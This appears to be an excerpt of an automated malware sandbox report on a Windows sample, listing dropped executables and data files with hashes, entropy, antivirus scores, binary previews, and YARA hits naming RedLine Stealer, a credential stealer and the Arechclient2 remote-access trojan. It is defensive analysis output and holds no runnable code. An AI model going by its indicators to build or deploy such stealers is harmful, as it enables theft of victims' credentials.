                                                                                                                                                                                                                            SHA-512:1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:PK.........?.X........I......bunch.dat\]...:.... "*...T.......N<wf..X $;.e..)....|u]+...U*V.~.....f.Rje.......@.f.r..V....J-.#U...*..=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[*.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O.*.:J%o.......`.f+O...W>.....S.INC.m.6..|wQ.xk.K.....o.D....:.n4....P>..*M._|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a.....*.7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.*......Z..5.(....]........
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1640960
                                                                                                                                                                                                                            Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                            MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                            SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                            SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                            SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1329417
                                                                                                                                                                                                                            Entropy (8bit):7.898171122766659
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
                                                                                                                                                                                                                            MD5:1E8237D3028AB52821D69099E0954F97
                                                                                                                                                                                                                            SHA1:30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
                                                                                                                                                                                                                            SHA-256:9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
                                                                                                                                                                                                                            SHA-512:A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1596416
                                                                                                                                                                                                                            Entropy (8bit):6.46619614175955
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                            MD5:10D51BECD0BBCE0FAB147FF9658C565E
                                                                                                                                                                                                                            SHA1:4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
                                                                                                                                                                                                                            SHA-256:7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
                                                                                                                                                                                                                            SHA-512:29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2469936
                                                                                                                                                                                                                            Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                            MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                            SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                            SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                            SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):87278
                                                                                                                                                                                                                            Entropy (8bit):4.38402884518968
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
                                                                                                                                                                                                                            MD5:A723BF46048E0BFB15B8D77D7A648C3E
                                                                                                                                                                                                                            SHA1:8952D3C34E9341E4425571E10F22B782695BB915
                                                                                                                                                                                                                            SHA-256:B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
                                                                                                                                                                                                                            SHA-512:CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4866096
                                                                                                                                                                                                                            Entropy (8bit):6.542818068158205
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
                                                                                                                                                                                                                            MD5:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                            SHA1:E10F3434EF3021C399DBBA047832F02B3C898DBD
                                                                                                                                                                                                                            SHA-256:4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
                                                                                                                                                                                                                            SHA-512:CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exe, Author: Joe Security
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):786944
                                                                                                                                                                                                                            Entropy (8bit):6.809298494568767
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
                                                                                                                                                                                                                            MD5:5AEBA331CE853D10C82B56ADC96C9E80
                                                                                                                                                                                                                            SHA1:A208059F9591712ABF451114815B693AB14A5AB3
                                                                                                                                                                                                                            SHA-256:EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
                                                                                                                                                                                                                            SHA-512:5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\xtfky, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\xtfky, Author: Joe Security
                                                                                                                                                                                                                            • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\xtfky, Author: ditekSHen
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1640960
                                                                                                                                                                                                                            Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                            MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                            SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                            SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                            SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1329417
                                                                                                                                                                                                                            Entropy (8bit):7.898171122766659
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
                                                                                                                                                                                                                            MD5:1E8237D3028AB52821D69099E0954F97
                                                                                                                                                                                                                            SHA1:30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
                                                                                                                                                                                                                            SHA-256:9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
                                                                                                                                                                                                                            SHA-512:A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1596416
                                                                                                                                                                                                                            Entropy (8bit):6.46619614175955
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                            MD5:10D51BECD0BBCE0FAB147FF9658C565E
                                                                                                                                                                                                                            SHA1:4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
                                                                                                                                                                                                                            SHA-256:7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
                                                                                                                                                                                                                            SHA-512:29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):87278
                                                                                                                                                                                                                            Entropy (8bit):4.38402884518968
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
                                                                                                                                                                                                                            MD5:A723BF46048E0BFB15B8D77D7A648C3E
                                                                                                                                                                                                                            SHA1:8952D3C34E9341E4425571E10F22B782695BB915
                                                                                                                                                                                                                            SHA-256:B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
                                                                                                                                                                                                                            SHA-512:CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                            Entropy (8bit):4.468130964551318
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:dIXfpi67eLPU9skLmb0b4/WSPKaJG8nAgejZMMhA2gX4WABl0uNbdwBCswSbn:OXD94/WlLZMM6YFHJ+n
                                                                                                                                                                                                                            MD5:8C8B6903119C2DF7CA30484BE7167963
                                                                                                                                                                                                                            SHA1:03AC8462E54C55A38B90EDDAD4B936BE1FA1A8FF
                                                                                                                                                                                                                            SHA-256:BE243F48E05E2378547B739BA9BB2641EF3B512B8F93CA412263A129057F34E5
                                                                                                                                                                                                                            SHA-512:5FA812A24E9003F109E0E9449DAB5B71313539B8AB616D921FC5B5D44C886B5DE7CBC5E434D5C5C742385A030AC009967D854349EF39AD711B4044B0F40385D9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...................................................................................................................................................................................................................................................................................................................................................UX..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.154015481788982
                                                                                                                                                                                                                            TrID:
